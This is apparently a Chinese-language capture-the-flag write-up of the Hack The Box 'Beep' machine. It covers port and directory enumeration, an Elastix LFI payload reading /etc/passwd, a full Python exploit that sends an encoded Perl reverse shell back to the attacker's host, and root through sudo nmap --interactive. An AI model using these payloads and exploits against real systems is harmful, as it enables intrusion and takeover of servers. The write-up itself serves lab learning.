免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/htb/Beep]└─# nmap -sV -Pn 10.10.10.7 -p- 130 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 01:07 ESTNmap scan report for 10.10.10.7Host is up (0.33s latency).Not shown: 65519 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Postfix smtpd80/tcp open http Apache httpd 2.2.3110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4111/tcp open rpcbind 2 (RPC #100000)143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4443/tcp open ssl/https?879/tcp open status 1 (RPC #100024)993/tcp open ssl/imap Cyrus imapd995/tcp open pop3 Cyrus pop3d3306/tcp open mysql MySQL (unauthorized)4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)4445/tcp open upnotifyp?4559/tcp open hylafax HylaFAX 4.3.105038/tcp open asterisk Asterisk Call Manager 1.110000/tcp open http MiniServ 1.570 (Webmin httpd)Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1565.01 seconds开了好多端口,事实当中端口越多破绽越多,然而具体到这些靶机,很可能意味着很多兔子洞,所以枚举的时候肯定要小心分辨
先用gobuster爆破80端口目录看看,须要次要要加-k跳过ssl验证
目录爆破
┌──(rootkali)-[~/dirsearch]└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -k -u https://10.10.10.7/ --wildcard ===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: https://10.10.10.7/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/12/09 02:53:35 Starting gobuster in directory enumeration mode===============================================================/.hta (Status: 403) [Size: 282]/.htaccess (Status: 403) [Size: 287]/.htpasswd (Status: 403) [Size: 287]/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]/cgi-bin/ (Status: 403) [Size: 286] Progress: 1041 / 4686 (22.22%) [ERROR] 2021/12/09 02:56:30 [!] Get "https://10.10.10.7/certs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]/favicon.ico (Status: 200) [Size: 894] /help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/] /images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/] /index.php (Status: 200) [Size: 1785] /lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/] /libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/] /mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/] /modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/] /robots.txt (Status: 200) [Size: 28] /static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/] Progress: 3959 / 4686 (84.49%) [ERROR] 2021/12/09 03:02:55 [!] Get "https://10.10.10.7/status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)Progress: 3986 / 4686 (85.06%) [ERROR] 2021/12/09 03:03:04 [!] Get "https://10.10.10.7/style_captcha": context deadline exceeded (Client.Timeout exceeded while awaiting headers)Progress: 4036 / 4686 (86.13%) [ERROR] 2021/12/09 03:03:19 [!] Get "https://10.10.10.7/swfobject.js": context deadline exceeded (Client.Timeout exceeded while awaiting headers)/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/] /var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/] 80端口的服务跑着一个叫elastix的cms,谷歌了一下这个cms存在一个LFI破绽,参考这个exp
验证POC如下
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action页面打印
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash Sorry! Attempt to access restricted file.ok,验证破绽存在。由下面打印可知存在用户:asterisk,spamfilter,fanis
用上面payload能够读到user.txt
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&actionLFI个别要联合上传破绽或者文件解析破绽能力拿到webshell
然而我找了一大圈一是没有找到上传入口,二是我找不到apache的access_log文件
初始shell
而后持续搜寻这个cms的利用破绽,发现还存在一个rce,在github上找到这个利用脚本
不过这个脚本我本地执行时要加上这两行:
ctx.set_ciphers('HIGH:!DH:!aNULL')ctx.set_ciphers('DEFAULT@SECLEVEL=1')不然可能会报ssl谬误
残缺exp如下:
#exploit modified by infosecjunky#https://infosecjunky.comimport urllib2import sslrhost="10.10.10.7"lhost="10.10.14.16"lport=4444extension="233"ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)ctx.check_hostname = Falsectx.verify_mode = ssl.CERT_NONEctx.set_ciphers('HIGH:!DH:!aNULL')ctx.set_ciphers('DEFAULT@SECLEVEL=1')# Reverse shell payloadurl = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib2.urlopen(url,context=ctx)拿到webshell
└─# nc -lnvp 4444listening on [any] 4444 ...connect to [10.10.14.16] from (UNKNOWN) [10.10.10.7] 49229iduid=100(asterisk) gid=101(asterisk)whoamiasterisk提权
python切换tty
python -c 'import pty; pty.spawn("/bin/sh")'
查看sudo 特权
sh-3.2$ sudo -lsudo -lMatching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper开了好多权限,抉择nmap提权到root
sh-3.2$ sudo /usr/bin/nmap --interactivesudo /usr/bin/nmap --interactiveStarting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )Welcome to Interactive Mode -- press h <enter> for helpnmap> !sh!shsh-3.2# ididuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)sh-3.2# whoamiwhoamirootsh-3.2# 总结
很简略的靶机,初始shell那里花了些功夫,找了良久access.log
root当前发现在这个地位:
sh-3.2# find / -name access_logfind / -name access_log/var/log/httpd/access_log而后web账号是没有读权限的
sh-3.2$ ididuid=100(asterisk) gid=101(asterisk)sh-3.2$ cat /var/log/httpd/access_logcat /var/log/httpd/access_logcat: /var/log/httpd/access_log: Permission denied要留神这些兔子洞。